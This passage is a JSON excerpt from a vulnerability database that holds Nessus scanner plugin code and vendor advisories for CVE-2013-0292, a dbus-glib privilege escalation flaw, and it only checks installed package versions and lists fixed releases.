"2013-03-01T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:dbus-glib-devel", "p-cpe:/a:centos:centos:dbus-glib", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2013-0568.NASL", "href": "https://www.tenable.com/plugins/nessus/64939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0568 and \n# CentOS Errata and Security Advisory 2013:0568 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64939);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"RHSA\", value:\"2013:0568\");\n\n script_name(english:\"CentOS 5 / 6 : dbus-glib (CESA-2013:0568)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus-glib packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\ndbus-glib is an add-on library to integrate the standard D-Bus library\nwith the GLib main loop and threading model.\n\nA flaw was found in the way dbus-glib filtered the message sender\n(message source subject) when the 'NameOwnerChanged' signal was\nreceived. This could trick a system service using dbus-glib (such as\nfprintd) into believing a signal was sent from a privileged process,\nwhen it was not. A local attacker could use this flaw to escalate\ntheir privileges. (CVE-2013-0292)\n\nAll dbus-glib users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications linked against dbus-glib, such as fprintd and\nNetworkManager, must be restarted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019258.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a2013a8c\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-March/019617.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?07a9c890\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2013-February/000807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?55dc6b72\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-glib packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-0292\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-glib-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/03/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-glib-0.73-11.el5_9\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-glib-devel-0.73-11.el5_9\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"dbus-glib-0.86-6.el6\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"dbus-glib-devel-0.86-6.el6\")) flag++;\n\n\nif (flag)\n{\n cr_plugin_caveat = '\\n' +\n 'NOTE: The security advisory associated with this vulnerability has a\\n' +\n 'fixed package version that may only be available in the continuous\\n' +\n 'release (CR) repository for CentOS, until it is present in the next\\n' +\n 'point release of CentOS.\\n\\n' +\n\n 'If an equal or higher package level does not exist in the baseline\\n' +\n 'repository for your major version of CentOS, then updates from the CR\\n' +\n 'repository will need to be applied in order to address the\\n' +\n 'vulnerability.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + cr_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib / dbus-glib-devel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:49", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Add patch to fix (CVE-2013-0292)\n\n - Resolves: #913072", "edition": 26, "published": "2016-06-22T00:00:00", "title": "OracleVM 3.2 : dbus-glib (OVMSA-2016-0057)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2016-06-22T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.2", "p-cpe:/a:oracle:vm:dbus-glib"], "id": "ORACLEVM_OVMSA-2016-0057.NASL", "href": "https://www.tenable.com/plugins/nessus/91741", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0057.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91741);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n\n script_name(english:\"OracleVM 3.2 : dbus-glib (OVMSA-2016-0057)\");\n script_summary(english:\"Checks the RPM output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Add patch to fix (CVE-2013-0292)\n\n - Resolves: #913072\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2016-June/000480.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected dbus-glib package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:dbus-glib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.2\", reference:\"dbus-glib-0.73-11.el5_9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus-glib\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T07:25:38", "description": "Sebastian Krahmer and Bastien Nocera discovered that DBus-GLib did not\nproperly validate the message sender when the 'NameOwnerChanged'\nsignal was received. A local attacker could possibly use this issue to\nescalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 27, "published": "2013-02-28T00:00:00", "title": "Ubuntu 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : dbus-glib vulnerability (USN-1753-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "modified": "2021-03-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libdbus-glib-1-2", "cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "cpe:/o:canonical:ubuntu_linux:12.10", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-1753-1.NASL", "href": "https://www.tenable.com/plugins/nessus/64929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1753-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64929);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2013-0292\");\n script_bugtraq_id(57985);\n script_xref(name:\"USN\", value:\"1753-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 11.10 / 12.04 LTS / 12.10 : dbus-glib vulnerability (USN-1753-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Sebastian Krahmer and Bastien Nocera discovered that DBus-GLib did not\nproperly validate the message sender when the 'NameOwnerChanged'\nsignal was received. A local attacker could possibly use this issue to\nescalate their privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1753-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libdbus-glib-1-2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libdbus-glib-1-2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/02/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|11\\.10|12\\.04|12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 11.10 / 12.04 / 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libdbus-glib-1-2\", pkgver:\"0.84-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libdbus-glib-1-2\", pkgver:\"0.94-4ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libdbus-glib-1-2\", pkgver:\"0.98-1ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"libdbus-glib-1-2\", pkgver:\"0.100-1ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libdbus-glib-1-2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-0292"], "description": "NameOwnerChanged signale processing privilege escalation", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:VULN:12915", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12915", "title": "dbus-glib privilege escalation", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-0292"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1753-1\r\nFebruary 27, 2013\r\n\r\ndbus-glib vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 11.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nAn attacker could send crafted input to applications using DBus-GLib and\r\npossibly escalate privileges.\r\n\r\nSoftware Description:\r\n- dbus-glib: simple interprocess messaging system\r\n\r\nDetails:\r\n\r\nSebastian Krahmer and Bastien Nocera discovered that DBus-GLib did not\r\nproperly validate the message sender when the "NameOwnerChanged" signal was\r\nreceived. A local attacker could possibly use this issue to escalate their\r\nprivileges.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n libdbus-glib-1-2 0.100-1ubuntu0.1\r\n\r\nUbuntu 12.04 LTS:\r\n libdbus-glib-1-2 0.98-1ubuntu1.1\r\n\r\nUbuntu 11.10:\r\n libdbus-glib-1-2 0.94-4ubuntu0.1\r\n\r\nUbuntu 10.04 LTS:\r\n libdbus-glib-1-2 0.84-1ubuntu0.3\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1753-1\r\n CVE-2013-0292\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/dbus-glib/0.100-1ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/dbus-glib/0.98-1ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/dbus-glib/0.94-4ubuntu0.1\r\n https://launchpad.net/ubuntu/+source/dbus-glib/0.84-1ubuntu0.3\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:DOC:29111", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29111", "title": "[USN-1753-1] DBus-GLib vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": " D-Bus add-on library to integrate the standard D-Bus library with the GLib thread abstraction and main loop. ", "modified": "2013-07-13T02:01:16", "published": "2013-07-13T02:01:16", "id": "FEDORA:784EA21BA2", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: dbus-glib-0.100-3.fc18", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0292"], "description": " D-Bus add-on library to integrate the standard D-Bus library with the GLib thread abstraction and main loop. ", "modified": "2013-07-08T00:57:38", "published": "2013-07-08T00:57:38", "id": "FEDORA:A0C4222260", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: dbus-glib-0.100-5.fc19", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}